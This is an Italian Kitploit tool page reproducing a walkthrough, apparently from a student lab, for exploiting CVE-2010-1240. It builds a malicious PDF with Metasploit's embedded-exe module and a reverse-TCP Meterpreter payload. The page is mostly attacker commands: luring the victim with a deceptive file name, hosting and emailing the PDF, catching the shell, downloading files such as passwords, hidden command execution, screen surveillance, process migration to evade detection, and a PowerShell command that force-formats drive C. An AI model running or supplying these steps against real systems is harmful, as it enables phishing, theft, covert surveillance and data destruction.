Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Embedded-PDF — Questo video dimostrativo mostra come possiamo controllare il dispositivo della vittima inviando al bersaglio un file PDF dall'aspetto innocente che in realtà è costituito da un payload incorporato. L'exploit è stato reso pubblico come CVE-2010-1240. | Kitploit
Strumenti/GitHubGitHub/jasmoon99/embedded-pdf
Strumenti di PhishingGenerazione di PayloadExploitPost-ExploitPenetration TestingCommand and ControlIngegneria SocialeApprendimento e FormazioneStrumento di Accesso Remoto
GitHubjasmoon99/embedded-pdf

Embedded-PDF

Questo video dimostrativo mostra come possiamo controllare il dispositivo della vittima inviando al bersaglio un file PDF dall'aspetto innocente che in realtà è costituito da un payload incorporato. L'exploit è stato reso pubblico come CVE-2010-1240.

7165 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Connessione Backdoor Incorporata tramite File PDF 😈

presentato da    

Introduzione

Questo video dimostrativo mostra come possiamo controllare il dispositivo della vittima inviando al bersaglio un file PDF dall'aspetto innocuo che in realtà contiene un payload incorporato. L'exploit è stato reso pubblico come CVE-2010-1240.

Non appena il PDF viene aperto in Adobe Reader, gli utenti che, ingannati da noi, accettano i pop-up di sicurezza, ci permetteranno di ottenere una sessione meterpreter connessa ai loro dispositivi tramite connessione TCP inversa. Da quel momento, tutti i loro dati e ciò che stanno facendo in tempo reale sono sotto la nostra sorveglianza.

Hehe~Boi

Elenco di Software/Strumenti

  • Metasploit
  • Adobe Reader <= 8.1.2

Ambiente

Kali Linux         Windows 7 or 10         Adobe Reader        

  • Macchina Attaccante: Kali Linux versione 2021.1
  • Sistema Operativo di Destinazione: Windows 10 (x86) o Windows 7 (x86)
  • Software di Destinazione: Adobe Reader 8.1.2

Passaggi Dettagliati

Per prima cosa, avviamo MSFconsole, che ci fornisce un'interfaccia a riga di comando per accedere al framework Metasploit.

root@kitploit:~
msfconsole

Successivamente, cerchiamo un exploit che corrisponda alla piattaforma Windows di destinazione e ad Adobe PDF Reader; verrà mostrato un intero elenco di exploit che possono essere usati per dirottare la macchina Windows della vittima e sfruttare le vulnerabilità di Adobe PDF Reader.

root@kitploit:~
search type:exploit platform:windows adobe pdf

In questa fase di attacco, selezioniamo e utilizziamo il modulo "adobe_pdf_embedded_exe" tramite il comando seguente per riuscire a dirottare la vittima.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Possiamo anche controllare le informazioni sull'exploit usando il comando “info” come mostrato di seguito:

root@kitploit:~
info

Poi, impostiamo il payload per usare una connessione TCP inversa. Usiamo anche Meterpreter, che fornisce una shell interattiva che ci facilita l'uso di tutti i tipi di funzioni, inserendo ed eseguendo codice per esplorare la macchina della vittima.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

Quindi, imposteremo l'host e la porta di ascolto. Per LHOST, dobbiamo inserire l'indirizzo IP della macchina attaccante, che in questo caso è l'indirizzo IP della nostra macchina Kali (10.0.2.4)*.

  • *p.s.
    • Devi usare l'IP della tua macchina Kali
    • Puoi usare un numero di porta diverso

Per quanto riguarda LPORT, sta a noi impostare un numero di porta che non sia comunemente usato.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

Quindi, imposteremo il file di input come base del PDF con il flag INFILENAME*. Successivamente, imposteremo il nome del file con qualcosa che attiri l'interesse della vittima ad aprire il file PDF dannoso.

  • *p.s.
    • Devi assicurarti del percorso del tuo file PDF
    • Puoi usare un nome file diverso
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

Possiamo rivedere le nostre opzioni prima di inserire il comando "exploit" per generare il payload insieme al PDF.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

Una volta generato il file PDF, lo sposteremo in /var/www/html, che è la directory della nostra macchina Kali che ospita il server web da cui la vittima scaricherà il file PDF.

  • Nota:
    • Se hai impostato un nome file diverso, assicurati di copiare il percorso giusto!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

Quindi, per configurare il nostro listener, useremo "exploit/multi/handler". Di nuovo, imposteremo payload, LHOST e LPORT in linea con quanto definito durante la generazione del file PDF dannoso. Poi eseguiremo il payload.

  • Nota:
    • LHOST: ricorda l'indirizzo IP della tua macchina Kali
    • LPORT: se hai impostato un numero di porta diverso, assicurati di digitare il numero correttamente
    • show info o show options sono comandi opzionali da eseguire.
      • Eseguirli serve solo per verificare quello che hai appena impostato
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

In un altro terminale, controlliamo lo stato del server Apache per assicurarci che sia in esecuzione e che ospiti il nostro file PDF in /var/www/html per il download da parte della vittima.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Sulla macchina Windows, apri un browser qualsiasi, ad esempio Chrome, e digita l'IP della nostra Kali (10.0.2.4)* per accedere al server web della macchina Kali.

*Nota: Ricorda l'indirizzo IP della tua macchina Kali

Quindi, simula un utente che salva il file PDF desiderato.

Una volta che la vittima apre il file in Adobe Reader 8.1.2 accettando i messaggi di sicurezza, possiamo osservare sulla nostra macchina Kali una nuova sessione connessa tramite connessione TCP inversa.

In uno scenario reale, configureremo un sito web con il PDF contenente il payload per consentire alla vittima di scaricare il file o allegarlo via email.


Risultato dello sfruttamento

A questo punto, possiamo accedere da remoto alla macchina della vittima e compiere ulteriori azioni dannose che desideriamo nella sessione meterpreter.

Per mostrare un elenco di cose che possiamo fare

root@kitploit:~
help

Elenca la directory corrente

root@kitploit:~
pwd

Elenca i file in quella directory

root@kitploit:~
ls

Scarica cartella o file dalla macchina della vittima

Ad esempio, se c'è un file chiamato password.txt, possiamo eseguire il comando download password.txt

root@kitploit:~
download [nome cartella | nome file con estensione]

Crea file sulla macchina della vittima

Naturalmente, possiamo scrivere script dannosi (impiantando una backdoor) per continuare a connetterci alla macchina Windows se siamo davvero malvagi! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Interagisci con Windows

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

Extra

Tuttavia, l'attaccante può ridurre i sospetti migrando il processo di meterpreter verso un altro processo usando il modulo migrate nella sessione meterpreter.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

Qui, genererà automaticamente un nuovo processo nella macchina della vittima su cui migrare. La vittima potrebbe quindi cancellare il file PDF infetto, completamente ignara che il processo è già finito altrove.

L'attaccante può inoltre creare script dannosi sulla macchina di destinazione usando il prompt dei comandi (cmd) o PowerShell, in grado di far crollare l'intero sistema operativo rendendolo non funzionante.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

Video Dimostrativo

Demo

Scarica lo strumento